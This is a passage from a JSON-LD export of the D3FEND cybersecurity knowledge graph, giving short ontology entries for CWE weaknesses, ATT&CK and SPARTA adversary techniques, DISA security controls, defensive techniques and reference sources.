      "rdfs:subClassOf": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CCI-000774_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uses organization-defined replay-resistant authentication mechanisms for network access to privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:One-timePassword"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000774"
    },
    {
      "@id": "d3f:CWE-1262",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1262",
      "d3f:definition": "The product uses memory-mapped I/O registers that act as an interface to hardware functionality from software, but there is improper access control to those registers.",
      "rdfs:label": "Improper Access Control for Register Interface",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "skos:prefLabel",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:CWE-1283",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1283",
      "d3f:definition": "The register contents used for attestation or measurement reporting data to verify boot flow are modifiable by an adversary.",
      "rdfs:label": "Mutable Attestation or Measurement Reporting Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CWE-206",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-206",
      "d3f:definition": "The product performs multiple behaviors that are combined to produce a single result, but the individual behaviors are observable separately in a way that allows attackers to reveal internal state or internal decision points.",
      "rdfs:label": "Observable Internal Behavioral Discrepancy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-205"
      }
    },
    {
      "@id": "d3f:Software-definedRadio",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:Receiver"
        },
        {
          "@id": "d3f:Software-definedRadioConfiguration"
        }
      ],
      "d3f:definition": "Software-defined radio (SDR) is a radio communication system where components that conventionally have been implemented in analog hardware (e.g. mixers, filters, amplifiers, modulators/demodulators, detectors, etc.) are instead implemented by means of software on a computer or embedded system.",
      "d3f:may-contain": {
        "@id": "d3f:Transmitter"
      },
      "d3f:synonym": "SDR",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Software-defined_radio"
      },
      "rdfs:label": "Software-defined Radio",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:N9e55cdd2384a49acb977f953376c57d0"
        },
        {
          "@id": "_:N75a29e45d43c490a8e6093466822bba1"
        },
        {
          "@id": "_:Ndec4dad8d5884b44bf28cd08344c6190"
        }
      ]
    },
    {
      "@id": "_:N9e55cdd2384a49acb977f953376c57d0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Receiver"
      }
    },
    {
      "@id": "_:N75a29e45d43c490a8e6093466822bba1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioConfiguration"
      }
    },
    {
      "@id": "_:Ndec4dad8d5884b44bf28cd08344c6190",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Transmitter"
      }
    },
    {
      "@id": "d3f:ATLASCredentialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0013"
      },
      "rdfs:label": "Credential Access Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:Nca8a1419f93f4b71ac62899995d7364e"
        }
      ],
      "skos:prefLabel": "Credential Access Technique"
    },
    {
      "@id": "_:Nca8a1419f93f4b71ac62899995d7364e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0013"
      }
    },
    {
      "@id": "d3f:SymbolicLink",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:addresses": {
        "@id": "d3f:File"
      },
      "d3f:definition": "A symbolic link (also symlink or soft link) is a term for any file that contains a reference to another file or directory in the form of an absolute or relative path and that affects pathname resolution.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Symbolic_link"
      },
      "rdfs:label": "Symbolic Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:FileSystemLink"
        },
        {
          "@id": "_:Nd4816085d3de4a228aab9aafc68efb2c"
        }
      ],
      "skos:altLabel": [
        "Soft Link",
        "Softlink",
        "Symlink"
      ]
    },
    {
      "@id": "_:Nd4816085d3de4a228aab9aafc68efb2c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addresses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:T1591",
      "@type": "owl:Class",
      "d3f:attack-id": "T1591",
      "d3f:definition": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.",
      "rdfs:label": "Gather Victim Org Information",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:EX-0013.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0013.02",
      "d3f:definition": "In this variant, the attacker injects non-useful energy or data, noise, malformed frames, or near-valid messages, so receivers and parsers labor to acquire, decode, and reject it. At the RF layer, wideband or protocol-shaped interference drives AGC and clock recovery to hunt, elevates BER, and forces repeated acquisitions; at the link layer, frames with correct preambles but bad CRCs keep decoders busy while yielding no payload; at the application layer, malformed packets force parse/validate/deny cycles that still consume CPU and fill error logs. On internal buses, collisions or bursts of misaddressed traffic reduce effective bandwidth and reorder legitimate messages. Even though little of the injected content passes semantic checks, the effort of dealing with it crowds out real work and may trigger retransmission storms or fallback modes that further increase load. The hallmark is volumetric invalid activity, crafted to engage front ends and parsers just long enough, that degrades integrity and availability without relying on privileged or authenticated commands.",
      "rdfs:label": "Erroneous Input - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0013/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0013"
      },
      "skos:prefLabel": "Erroneous Input"
    },
    {
      "@id": "d3f:T1639.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1639.001",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.",
      "rdfs:label": "Exfiltration Over Unencrypted Non-C2 Protocol - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1639"
      },
      "skos:prefLabel": "Exfiltration Over Unencrypted Non-C2 Protocol"
    },
    {
      "@id": "d3f:T1132.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1132.002",
      "d3f:definition": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding)",
      "rdfs:label": "Non-Standard Encoding",
      "rdfs:subClassOf": {
        "@id": "d3f:T1132"
      }
    },
    {
      "@id": "d3f:T1037.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1037.005",
      "d3f:definition": "Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)",
      "d3f:modifies": {
        "@id": "d3f:SystemStartupDirectory"
      },
      "rdfs:label": "Startup Items",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1037"
        },
        {
          "@id": "_:N8d55ae2ac7234bf1b03aab21c6b59a8c"
        }
      ]
    },
    {
      "@id": "_:N8d55ae2ac7234bf1b03aab21c6b59a8c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemStartupDirectory"
      }
    },
    {
      "@id": "d3f:T1571",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1571",
      "d3f:definition": "Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Non-Standard Port",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:Nf5feb50a991e498399aca9b2f3846428"
        }
      ]
    },
    {
      "@id": "_:Nf5feb50a991e498399aca9b2f3846428",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:DE-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0001",
      "d3f:definition": "The adversary suppresses or alters fault detection, isolation, and recovery (FDIR) so unauthorized actions proceed without triggering safing or alerts. Targets include watchdogs and heartbeat monitors; limit and sanity checks on sensor/command values; command interlocks and inhibit masks; voting and redundancy-management logic; and event/alert generation and routing. Techniques range from patching or bypassing checks in flight code, to rewriting parameter/limit tables, to muting publishers that report faults. More subtle variants desensitize thresholds, freeze counters, or delay responses just long enough for a malicious sequence to complete. With FDIR dulled or offline, anomalous states resemble nominal behavior and automated mitigations do not engage, masking the attack from ground oversight.",
      "rdfs:label": "Disable Fault Management - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTADefenseEvasionTechnique"
      },
      "skos:prefLabel": "Disable Fault Management"
    },
    {
      "@id": "d3f:VirtualAddress",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A virtual address in memory is a pointer or marker for a memory space that an operating system allows a process to use. The virtual address points to a location in primary storage that a process can use independently of other processes.",
      "d3f:synonym": "Logical Address",
      "rdfs:isDefinedBy": {
        "@id": "https://www.techopedia.com/definition/9934/virtual-address-va"
      },
      "rdfs:label": "Virtual Address",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/page/Virtual_address_space"
        },
        {
          "@id": "https://en.wikipedia.org/wiki/Memory_address#Logical_addresses"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryAddress"
      }
    },
    {
      "@id": "d3f:RegSetKeyValueW",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SetSystemConfigValue"
      ],
      "rdfs:label": "RegSetKeyValueW"
    },
    {
      "@id": "d3f:windows-registry-key",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x value y: The key-value pair x has the key y.",
      "rdfs:label": "windows-registry-key",
      "rdfs:subPropertyOf": {
        "@id": "d3f:windows-registry-data-property"
      },
      "skos:altLabel": "key"
    },
    {
      "@id": "d3f:ContainerImageAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContainerImageAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:ContainerImage"
      },
      "d3f:d3fend-id": "D3-CIA",
      "d3f:definition": "Analyzing a Container Image with respect to a set of policies.",
      "d3f:kb-article": "## How it works\n\nContainer images are standalone collections of the executable code and\ncontent that are used to populate a container environment.\nThey are usually created by either building a container from scratch or by\nbuilding on top of an existing image pulled from a repository.\n\nThroughout the container build workflow,\nimages should be scanned to identify:\n\n- outdated libraries,\n- known vulnerabilities,\n- or misconfigurations, such as insecure ports or permissions.\n\nScanning should also provide the flexibility to disregard false positives\nfor vulnerability detection where knowledgeable\ncybersecurity professionals have deemed alerts to be inaccurate.\n\nOne approach to implementing image scanning is to use an admission controller\nto block deployments if the image does not comply with the organization's\nsecurity policies.\n\nAn admission controller is a Container Orchestration feature that can intercept and\nprocess requests to the Container Orchestration API prior to persistence of the object,\nbut after the request is authenticated and authorized.\nA webhook can be implemented to scan any image before it is deployed in the orchestrator.\nThis admission controller\n\n## Considerations\n\n* Image scanning is key to ensuring deployed containers are secure.\n* Using trusted repositories to build containers is a critical part of the container build workflow.\n* This technique does not necessarly prevent the build process to add insecure or unsecured\n  files to the Image.\n",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ContainerImageAnalysis"
      },
      "d3f:synonym": "Container Image Scanning",
      "rdfs:label": "Container Image Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AssetVulnerabilityEnumeration"
        },
        {
          "@id": "_:N5a3f67b668a947159d123b8068e929e6"
        }
      ]
    },
    {
      "@id": "_:N5a3f67b668a947159d123b8068e929e6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ContainerImage"
      }
    },
    {
      "@id": "d3f:OTIOModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:communicates-with": [
        {
          "@id": "d3f:OTActuator"
        },
        {
          "@id": "d3f:OTSensor"
        }
      ],
      "d3f:definition": "An OT I/O Module is an industrial-grade interface designed for harsh Operational Technology (OT) environments. It reliably connects sensors and actuators to industrial control systems, ensuring precise, real-time data exchange in applications such as SCADA or ICS. Engineered for ruggedness and consistent performance, it can manage analog, digital, or other specialized signal types while enduring demanding conditions.",
      "rdfs:comment": "There are many types of I/O modules, including: analog input, analog output, HART input, HART output, digital input, digital output, mV input, pulse input, universal I/O, vibration input, and many other types of input or output modules. The functionality of the I/O Module can be embedded in the controller or as a separate module connected via chassis or I/O link.",
      "rdfs:isDefinedBy": {
        "@id": "https://consteel-electronics.com/articles/what-is-IO-module"
      },
      "rdfs:label": "OT I/O Module",
      "rdfs:seeAlso": {
        "@id": "https://www.rockwellautomation.com/en-us/support/documentation/technical/i-o/compact-5000-i-o-modules.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IOModule"
        },
        {
          "@id": "_:Nd99809856a3046c791a2656dafa1e820"
        },
        {
          "@id": "_:Nffa7be9df45d448299d294b438cf0616"
        }
      ],
      "skos:example": "Rockwell Compact 5000 IO Module"
    },
    {
      "@id": "_:Nd99809856a3046c791a2656dafa1e820",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:communicates-with"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTActuator"
      }
    },
    {
      "@id": "_:Nffa7be9df45d448299d294b438cf0616",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:communicates-with"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTSensor"
      }
    },
    {
      "@id": "d3f:T1499.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1499.004",
      "d3f:definition": "Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.",
      "rdfs:label": "Application or System Exploitation",
      "rdfs:subClassOf": {
        "@id": "d3f:T1499"
      }
    },
    {
      "@id": "d3f:T1547.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.007",
      "d3f:definition": "Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to \"Reopen windows when logging back in\".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.",
      "d3f:modifies": {
        "@id": "d3f:ApplicationConfigurationFile"
      },
      "rdfs:label": "Re-opened Applications",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N89e09e43ccd14f01a3cd8f30eede2dfc"
        }
      ]
    },
    {
      "@id": "_:N89e09e43ccd14f01a3cd8f30eede2dfc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfigurationFile"
      }
    },
    {
      "@id": "d3f:ExceptionHandler",
      "@type": "owl:Class",
      "d3f:definition": "An exception handler is a code segment that processes an exception.",
      "rdfs:label": "Exception Handler",
      "rdfs:seeAlso": {
        "@id": "dbr:Exception_handling"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:CWE-1279",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1279",
      "d3f:definition": "Performing cryptographic operations without ensuring that the supporting inputs are ready to supply valid data may compromise the cryptographic result.",
      "rdfs:label": "Cryptographic Operations are run Before Supporting Units are Ready",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-665"
        },
        {
          "@id": "d3f:CWE-696"
        }
      ]
    },
    {
      "@id": "d3f:Reference-SMBCopyAndExecution_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-05-005/"
      },
      "d3f:kb-abstract": "An adversary needs to gain access to other hosts to move throughout an environment. In many cases, this is a twofold process. First, a file is remotely written to a host via an SMB share (detected by CAR-2013-05-003). Then, a variety of Execution techniques can be used to remotely establish execution of the file or script. To detect this behavior, look for files that are written to a host over SMB and then later run directly as a process or in the command line arguments. SMB File Writes and Remote Execution may happen normally in an environment, but the combination of the two behaviors is less frequent and more likely to indicate adversarial activity.\n\nThis can possibly extend to more copy protocols in order to widen its reach, or it could be tuned more finely to focus on specific program run locations (e.g. %SYSTEMROOT%\\system32) to gain a higher detection rate.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:IPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-05-005: SMB Copy and Execution",
      "rdfs:label": "Reference - CAR-2013-05-005: SMB Copy and Execution - MITRE"
    },
    {
      "@id": "d3f:SharedLibraryFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A shared library file is a file that is intended to be shared by executable files and further shared library (object) files. Modules used by a program are loaded from individual shared objects into memory at load time or runtime, rather than being copied by a linker when it creates a single monolithic executable file for the program",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Library_(computing)#Shared_libraries"
      },
      "rdfs:label": "Shared Library File",
      "rdfs:subClassOf": {
        "@id": "d3f:ObjectFile"
      },
      "skos:altLabel": [
        "Shared Library",
        "Shared Object"
      ]
    },
    {
      "@id": "d3f:CCI-000194_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces password complexity by the minimum number of numeric characters used.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000194"
    },
    {
      "@id": "d3f:T1678",
      "@type": "owl:Class",
      "d3f:attack-id": "T1678",
      "d3f:definition": "Adversaries may employ various time-based methods to evade detection and analysis. These techniques often exploit system clocks, delays, or timing mechanisms to obscure malicious activity, blend in with benign activity, and avoid scrutiny. Adversaries can perform this behavior within virtualization/sandbox environments or natively on host systems.",
      "rdfs:label": "Delay Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:SpacecraftSafeMode",
      "@type": "owl:Class",
      "d3f:definition": "Safe mode is an operating mode of a modern uncrewed spacecraft during which all non-essential systems are shut down and only essential functions such as thermal management, radio reception and attitude control are active.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Safe_mode_in_spacecraft"
      },
      "rdfs:label": "Spacecraft Safe Mode",
      "rdfs:subClassOf": {
        "@id": "d3f:SafeMode"
      }
    },
    {
      "@id": "d3f:ServiceDependencyMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ServiceDependencyMapping"
      ],
      "d3f:d3fend-id": "D3-SVCDM",
      "d3f:definition": "Service dependency mapping determines the services on which each given service relies.",
      "d3f:kb-article": "## How it works\nThe organization collects and models architectural information about the services and consumers of services and maps the dependencies between the services.\n\n## Considerations\n* Architectural design artifacts and SMEs may need to be consulted to determine if dependencies are intended or otherwise essential.\n* Service dependencies for critical systems--those supporting critical organizational activities--should be prioritized for supply chain risk analysis.\n* Service dependencies in cloud or microservice architectures may be discovered using distributed tracing capabilities",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CatiaUAFPlugin"
        },
        {
          "@id": "d3f:Reference-TivoliApplicationDependencyDiscoverManager7_3_0DependenciesBetweenResources"
        },
        {
          "@id": "d3f:Reference-UnifiedArchitectureFrameworkUAF"
        }
      ],
      "d3f:maps": {
        "@id": "d3f:ServiceDependency"
      },
      "d3f:synonym": "Distributed Tracing",
      "rdfs:label": "Service Dependency Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemMapping"
        },
        {
          "@id": "_:N59f3a5e0995444cab017547a57218c1c"
        }
      ]
    },
    {
      "@id": "_:N59f3a5e0995444cab017547a57218c1c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceDependency"
      }
    },
    {
      "@id": "d3f:Reference-WhatIsNetworkAccessControl",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.fortinet.com/resources/cyberglossary/what-is-network-access-control"
      },
      "d3f:kb-abstract": "Network access control (NAC), also known as network admission control, is the process of restricting unauthorized users and devices from gaining access to a corporate or private network. NAC ensures that only users who are authenticated and devices that are authorized and compliant with security policies can enter the network.",
      "d3f:kb-organization": "Fortinet",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:LANAccessMediation"
        },
        {
          "@id": "d3f:NetworkAccessMediation"
        },
        {
          "@id": "d3f:RoutingAccessMediation"
        }
      ],
      "d3f:kb-reference-title": "What is Network Access Control?",
      "rdfs:label": "Reference - What is Network Access Control?"
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForDetectionOfAChangeInBehaviorInTheUseOfAWebsiteThroughVectorVelocityAnalysis_SilverTailSystems",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20100235909A1/en?oq=US+20100235909+A1"
      },
      "d3f:kb-abstract": "A system and software for identifying the change of user behavior on a website includes analyzing the actions of users on a website comprising a plurality of fields or input parameters that identify the actions performed on a website including fields related to previous actions by that user or other users of the website. The fields or input parameters are represented in a vector format where vectors represent different sessions of activity on the website, pages of the website, users of the website, or other attributes of the use of a website. Analysis is performed to determine if new sessions are similar or dissimilar to previously known sessions and if a session is converging or diverging from known sessions based on the velocity and direction of the velocity of the vectors in the vector space.",
      "d3f:kb-author": "Mike Eynon; Laura Mather; Erik Westland; Jim Lloyd",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting fraudulent behavior on a website. Website behavior is mapped to build a multidimensional representation of user actions on a website that is updated as additional actions are recorded. Example actions on a website that are recorded include clicks by a user on the website and entering data into forms. Current behavior is compared against baseline recorded behavior and if current behavior deviates above a threshold, an alert is issued.",
      "d3f:kb-organization": "Silver Tail Systems",
      "d3f:kb-reference-of": {
        "@id": "d3f:WebSessionActivityAnalysis"
      },
      "d3f:kb-reference-title": "System and Method for Detection of a Change in Behavior in the Use of a Website Through Vector Velocity Analysis",
      "rdfs:label": "Reference - System and Method for Detection of a Change in Behavior in the Use of a Website Through Vector Velocity Analysis - Silver Tail Systems"
    },
    {
      "@id": "d3f:CertificateFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Certificate"
      },
      "d3f:definition": "A file containing a digital certificate. In cryptography, a public key certificate (also known as a digital certificate or identity certificate) is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Public_key_certificate"
      },
      "rdfs:label": "Certificate File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:Nd9936b94889f4bf8b3bed13175eb2b6e"
        }
      ]
    },
    {
      "@id": "_:Nd9936b94889f4bf8b3bed13175eb2b6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Certificate"
      }
    },
    {
      "@id": "d3f:abuses",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x abuses y: The entity x applies an artifact y to a wrong thing or person; x applies y badly or incorrectly.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01163606-v"
      },
      "rdfs:label": "abuses",
      "rdfs:subPropertyOf": {
        "@id": "d3f:uses"
      },
      "skos:altLabel": [
        "misapplies",
        "misuses"
      ]
    },
    {
      "@id": "d3f:WriteProtectSwitch",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A physical device used to restrict configuration of a device.",
      "d3f:restricts": {
        "@id": "d3f:Storage"
      },
      "rdfs:label": "Write Protect Switch",
      "rdfs:seeAlso": [
        {
          "@id": "https://web-material3.yokogawa.com/FGP-110__5_.us.pdf"
        },
        "NIST SP 800-82r3, Appendix F, SC-51 Hardware-Based Protection"
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:N773b5d8d49fa4a43abff685163b4319d"
        }
      ]
    },
    {
      "@id": "_:N773b5d8d49fa4a43abff685163b4319d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Storage"
      }
    },
    {
      "@id": "d3f:FTPGetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is downloaded from an FTP server to a client, retrieving data from the remote system to the local destination.",
      "rdfs:label": "FTP Get Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FTPEvent"
        },
        {
          "@id": "_:N78bdfc7b17c2421eab0ca6455ceac510"
        }
      ]
    },
    {
      "@id": "_:N78bdfc7b17c2421eab0ca6455ceac510",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FTPPutEvent"
      }
    },
    {
      "@id": "d3f:CWE-670",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-670",
      "d3f:definition": "The code contains a control flow path that does not reflect the algorithm that the path is intended to implement, leading to incorrect behavior any time this path is navigated.",
      "rdfs:label": "Always-Incorrect Control Flow Implementation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:Reference-UACBypass_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-04-001/"
      },
      "d3f:kb-abstract": "Bypassing user account control (UAC Bypass) is generally done by piggybacking on a system process that has auto-escalate privileges. This analytic looks to detect those cases as described by the open-source UACME tool.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-04-001: UAC Bypass",
      "rdfs:label": "Reference - CAR-2019-04-001: UAC Bypass - MITRE"
    },
    {
      "@id": "d3f:CCI-001090_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents unauthorized and unintended information transfer via shared system resources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:NetworkTrafficFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001090"
    },
    {
      "@id": "d3f:ByteSequenceEmulation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ByteSequenceEmulation"
      ],
      "d3f:d3fend-id": "D3-BSE",
